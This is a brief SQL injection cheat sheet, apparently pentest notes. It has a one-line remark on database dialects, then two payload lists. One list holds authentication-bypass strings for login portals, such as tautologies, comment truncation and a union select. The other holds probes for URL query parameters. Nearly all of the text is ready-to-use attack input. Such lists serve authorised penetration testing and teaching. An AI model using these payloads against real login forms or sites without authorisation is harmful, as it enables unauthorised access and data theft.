# SQL Injection

## SQL Theory

SQL syntax, commands, and functions vary based on which relational databases they were made for.  MySQL, Microsoft SQL Server, PostgreSQL, and Oracle are the most popular databases.

## Quick-Hitters

### Login Portals:

```
admin' or '1'='1
" or ""="
' or 1=1 -- -
' union select 1,2,3 -- -
admin'-- -
' or "-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or 1=1 or "='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
```

### URL Parameters

For `https://site.com?q=HERE`

```
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
```